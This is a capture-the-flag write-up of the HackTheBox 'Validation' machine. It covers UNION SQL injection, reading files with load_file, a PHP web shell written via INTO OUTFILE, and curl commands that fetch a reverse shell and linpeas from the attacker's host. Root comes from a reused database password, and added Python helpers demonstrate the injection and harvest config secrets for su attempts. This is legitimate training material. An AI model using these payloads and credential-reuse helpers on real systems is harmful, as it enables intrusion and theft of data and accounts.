Disclaimer

The hosts attacked in this article are legally authorized targets. The tools and techniques shown are for learning and discussion only; do not use them for any illegal purpose. I take no responsibility for any consequences, misuse, or damage arising from them.

Service detection

```
┌──(root💀kali)-[~/HTB]
└─# nmap -sV -Pn 10.10.11.116 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-29 03:48 EST
Nmap scan report for 10.10.11.116
Host is up.
Not shown: 65522 closed ports
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http           Apache httpd 2.4.48 ((Debian))
4566/tcp open     http           nginx
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
5005/tcp filtered avt-profile-2
5006/tcp filtered wsm-server
5007/tcp filtered wsm-server-ssl
5008/tcp filtered synapsis-edge
8080/tcp open     http           nginx
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1102.01 seconds
```

Worth noting: SSH identifies the host as Ubuntu while Apache on port 80 reports a Debian build, which suggests the web application runs in a separate container rather than directly on the host.

Directory brute-forcing

```
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e * -t 100 -u http://10.10.11.116

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.11.116/_21-11-29_04-17-51.txt

Error Log: /root/dirsearch/logs/errors-21-11-29_04-17-51.log

Target: http://10.10.11.116/

[04:17:52] Starting:
[04:18:57] 200 -    0B  - /config.php
[04:19:00] 301 -  310B  - /css  ->  http://10.10.11.116/css/
[04:19:16] 200 -   16KB - /index.php
[04:19:17] 200 -   16KB - /index.php/login/
[04:19:18] 403 -  277B  - /js/
```

Only a handful of files, and nothing of interest in the page source. Note that /config.php answers 200 with an empty body: the file exists and is executed server-side, so whatever it contains is not exposed over HTTP.

The index page asks for a name and a country; submitting the form takes you to another page that displays the name you just entered, which suggests the value is stored in and read back from a database.

So, is there SQL injection?

SQL injection

Use Burp to capture the POST request to index.php and save it to a file named data:

```
┌──(root💀kali)-[~/HTB/Validation]
└─# cat data
POST /index.php HTTP/1.1
Host: 10.10.11.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://10.10.11.116
Connection: close
Referer: http://10.10.11.116/
Upgrade-Insecure-Requests: 1

username=max&country=Brazil
```

Try running sqlmap against it:

```
┌──(root💀kali)-[~/HTB/Validation]
└─# sqlmap -r data --batch --level=5 --risk=3
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:36:41 /2021-11-29/

[09:36:41] [INFO] parsing HTTP request from 'data'
[09:36:41] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.10.11.116:80/account.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[09:36:42] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[09:36:42] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--proxy', '--proxy-file'...)
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[09:36:44] [CRITICAL] unable to connect to the target URL
[09:36:44] [INFO] testing if the target URL content is stable
[09:36:45] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[09:36:48] [CRITICAL] unable to connect to the target URL
[09:36:48] [WARNING] POST parameter 'username' does not appear to be dynamic
[09:36:49] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[09:36:50] [CRITICAL] unable to connect to the target URL
[09:36:50] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[09:36:50] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue? [y/N] N
[09:36:51] [WARNING] your sqlmap version is outdated

[*] ending @ 09:36:51 /2021-11-29/
```

Failed. Note what actually happened, though: the run aborted on repeated "unable to connect" errors before the country parameter was ever tested, and the only warning about injectability concerns username. This is a tooling failure, not evidence that the form is safe, so fall back to testing by hand.

Start with a single quote in the country parameter:

```
username=max&country=Andorra'
```

The response is a PHP error:

```
Fatal error: Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33 Stack trace: #0 {main} thrown in /var/www/html/account.php on line 33
```

The quote was parsed as SQL: it broke the query, the mysqli query call returned false instead of a result set, and account.php then called fetch_assoc() on that boolean. So the country value is concatenated straight into the query string, and the error path tells us the vulnerable query lives in account.php, the page index.php redirects to, which is where the results of the payloads below are rendered.

Get the MariaDB version. The UNION below works with a single column, which tells us the original SELECT returns exactly one column; on a different target you would first establish the column count (ORDER BY n, or UNION SELECT NULL,NULL,... until the error goes away).

```
username=max&country=Andorra' union select @@version -- -
```

Returns: 10.5.11-MariaDB-1

Get the current database name:

```
username=max&country=Andorra' union select database() -- -
```

Returns: registration

List the tables of the current database, with each table's schema, row count and comment, via information_schema (char(10) is a newline, so the fields come back on separate lines):

```
username=max&country=Andorra' union select concat(table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)) from information_schema.tables where table_schema=database() -- -
```

Returns: registration 30

The same technique (the usual user() and @@datadir probes) gives the database user as uhc@localhost and the data directory as /var/lib/mysql/.
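To make the mechanics concrete, here is an added worked example (my code, not from the original write-up): a small sqlite3 stand-in for the target's registration database with the vulnerable string-concatenated lookup beside its parameterized fix. It reproduces the three things seen above, the quote that makes the query fail, the single-column UNION that returns expressions such as the version, and the information_schema-style table listing (sqlite_master plays that role here), and adds the column-count probe the write-up skipped. The table contents, the column names and the lookup helpers are assumptions; the real target ran MariaDB, where the same payloads apply with information_schema and @@version.

```python
import sqlite3

# Constructed stand-in for the target's `registration` database (the real
# target ran MariaDB 10.5.11; sqlite3 is used so this runs offline, and
# sqlite_master plays the role of information_schema.tables).
SCHEMA = """
CREATE TABLE registration (username TEXT, country TEXT);
INSERT INTO registration VALUES ('max', 'Brazil'), ('alice', 'Andorra');
"""


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, country, columns="username"):
    """Mimics the account.php behaviour: the country value is pasted into
    the SQL string. `columns` is a knob for the column-count demo only."""
    sql = f"SELECT {columns} FROM registration WHERE country = '{country}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, country):
    """Hardened form: the value travels as a bound parameter, so a quote
    or a UNION inside it is just data."""
    sql = "SELECT username FROM registration WHERE country = ?"
    return conn.execute(sql, (country,)).fetchall()


def breaks_query(conn, payload):
    """True if the payload makes the concatenated query fail to parse.
    On the target this surfaced as fetch_assoc() being called on bool."""
    try:
        lookup_vulnerable(conn, payload)
        return False
    except sqlite3.OperationalError:
        return True


def probe_column_count(conn, columns="username", max_cols=8):
    """Grow UNION SELECT NULL,NULL,... until the query stops erroring; the
    first n that works is the original SELECT's column count. The write-up
    skipped this step because the target query had exactly one column."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            lookup_vulnerable(conn, f"Andorra' UNION SELECT {nulls}-- -", columns)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def union_extract(conn, expression):
    """Pull one expression through the UNION, the same shape as the page's
    `Andorra' union select <expr> -- -` payloads. Returns only the injected
    values (rows that are not real usernames for that country)."""
    rows = lookup_vulnerable(conn, f"Andorra' UNION SELECT {expression}-- -")
    legit = {r[0] for r in lookup_vulnerable(conn, "Andorra")}
    return sorted(r[0] for r in rows if r[0] not in legit)


if __name__ == "__main__":
    db = fresh_db()
    print("quote breaks query:", breaks_query(db, "Andorra'"))
    print("columns:", probe_column_count(db))
    print("version:", union_extract(db, "sqlite_version()"))
    print("tables:", union_extract(db, "name FROM sqlite_master WHERE type='table'"))
    print("safe lookup:", lookup_safe(db, "Andorra' UNION SELECT sqlite_version()-- -"))
```

Run it directly to see the five results. The safe variant returns nothing for the injected string because the whole string is compared as a literal country name, which is the entire fix: bind the value, never build the query with it.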

Read /etc/passwd with load_file():

```
username=max&country=Andorra' union select load_file("/etc/passwd") -- -
```

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
mysql:x:104:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:105:106::/nonexistent:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
```

Surprisingly, there are no ordinary users at all: root is the only account with a login shell, so there is nobody to SSH in as even if we found credentials. A web shell is the way forward.

Since the database user can read files, try writing one into the webroot with INTO OUTFILE, starting with a phpinfo() stub:

```
username=max&country=Andorra' union select "<?php phpinfo(); ?>" into outfile "/var/www/html/exp.php" -- -
```

Requesting /exp.php displays the phpinfo() page. That one result confirms everything INTO OUTFILE needs: the database account holds the FILE privilege, secure_file_priv does not restrict writes to /var/www/html, the directory is writable by the database process, and Apache executes what lands there.

Now write an actual web shell, a one-liner such as the following (this took a fair number of attempts):

```
username=max&country=Andorra' union select "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/exp.php"; -- -
```

Request {IP}/exp.php?cmd=id to trigger it.

Returns:

```
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

{IP}/exp.php?cmd=cat /home/htb/user.txt reads the user flag.

Get a proper shell

This shell is awkward to work with, so use it to fetch a PHP reverse shell from our host (served over a simple HTTP server on port 8000) and drop it next to exp.php:

```
{IP}/exp.php?cmd=curl%20http://10.10.14.15:8000/reverse-shell.php%20-o%20./shell.php
```

Then request the new file to trigger the callback to our listener:

```
{IP}/shell.php
```

```
┌──(root💀kali)-[~/HTB/Validation]
└─# nc -lnvp 462
listening on [any] 462 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.116] 48802
Linux Validation 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64 GNU/Linux
 16:55:32 up  3:52,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
```

Privilege escalation

Transfer linpeas.sh to the target (again from the HTTP server on our host):

```
curl http://10.10.14.15:8000/linpeas.sh -o /tmp/linpeas.sh
```

linpeas flagged a binary carrying the cap_chown capability, which in principle is usable for escalation (it lets the binary change file ownership regardless of who runs it), but I did not work out how to use it here.

Instead, read the web application's configuration file and try the database password against root with su, on the chance that it was reused:

```
$ cat config.php
<?php
  $servername = "127.0.0.1";
  $username = "uhc";
  $password = "{this is the password}";
  $dbname = "registration";
  $conn = new mysqli($servername, $username, $password, $dbname);
?>
$ su
Password:
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
{...}
```

The database password was indeed reused as the root password; that, not the capability, is the escalation.
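As an added example (my code, not from the original write-up), here is a Python helper for the two bookkeeping steps of this escalation: pulling the login-capable accounts out of /etc/passwd (read earlier via load_file) and harvesting password-looking string literals from PHP configuration files, then pairing them into the su candidates to try. It goes a little beyond the page's config.php by also recognising the define('DB_PASSWORD', ...) and new PDO(dsn, user, pass) styles. All sample inputs are constructed; the password values are made up and the /etc/passwd excerpt is abridged from the one above.

```python
import re

# Constructed sample inputs modelled on what the write-up reads off the
# target. The passwd excerpt is abridged; the secrets are fake.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:104:105:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
"""

CONFIG_SAMPLE = """\
<?php
  $servername = "127.0.0.1";
  $username = "uhc";
  $password = "n0t-the-real-one";
  $dbname = "registration";
  $conn = new mysqli($servername, $username, $password, $dbname);
?>
"""

# A second, WordPress-style config to show the other common shapes.
WP_SAMPLE = """\
<?php
define('DB_USER', 'wpuser');
define( 'DB_PASSWORD', 'wp-secret' );
$db = new PDO('mysql:host=localhost;dbname=wp', 'wpuser', 'wp-secret');
"""

# Shells that never give an interactive session, so su/ssh as that user is pointless.
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def interactive_accounts(passwd_text):
    """Accounts from /etc/passwd whose shell could actually accept a login."""
    users = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) != 7:          # skip blank or malformed lines
            continue
        name, shell = parts[0], parts[6]
        if shell not in NON_LOGIN_SHELLS:
            users.append(name)
    return users


# $password = "..."; / $db_pwd = '...'; style assignments
_ASSIGN = re.compile(r"\$(\w*(?:pass|pwd|secret)\w*)\s*=\s*(['\"])(.*?)\2", re.I)
# define('DB_PASSWORD', '...') style constants
_DEFINE = re.compile(r"define\(\s*(['\"])(\w*(?:PASS|PWD|SECRET)\w*)\1\s*,\s*(['\"])(.*?)\3", re.I)
# new PDO('dsn', 'user', 'pass') style constructors
_PDO = re.compile(r"new\s+PDO\(\s*(['\"]).*?\1\s*,\s*(['\"])(.*?)\2\s*,\s*(['\"])(.*?)\4", re.I | re.S)


def harvest_secrets(php_text):
    """Return (name, value) pairs for password-looking literals, deduplicated on value."""
    found = []
    for m in _ASSIGN.finditer(php_text):
        found.append((m.group(1), m.group(3)))
    for m in _DEFINE.finditer(php_text):
        found.append((m.group(2), m.group(4)))
    for m in _PDO.finditer(php_text):
        found.append(("PDO:" + m.group(3), m.group(5)))
    seen, out = set(), []
    for name, value in found:
        if value and value not in seen:
            seen.add(value)
            out.append((name, value))
    return out


def reuse_candidates(passwd_text, *php_texts):
    """Every harvested secret paired with every login-capable account: the
    list to try with `su <user>`, which is exactly the move the write-up
    makes with the uhc database password against root."""
    secrets = [v for t in php_texts for _, v in harvest_secrets(t)]
    return [(u, s) for u in interactive_accounts(passwd_text) for s in secrets]


if __name__ == "__main__":
    for user, secret in reuse_candidates(PASSWD_SAMPLE, CONFIG_SAMPLE, WP_SAMPLE):
        print(f"try: su {user}  (password candidate: {secret})")
```

On this box the candidate list collapses to root paired with the one database password, which is the only reason `su` with no arguments was the right first guess; on a host with more login-capable users, the same pairing tells you how many attempts you are about to make before you start generating failed-login noise in auth.log.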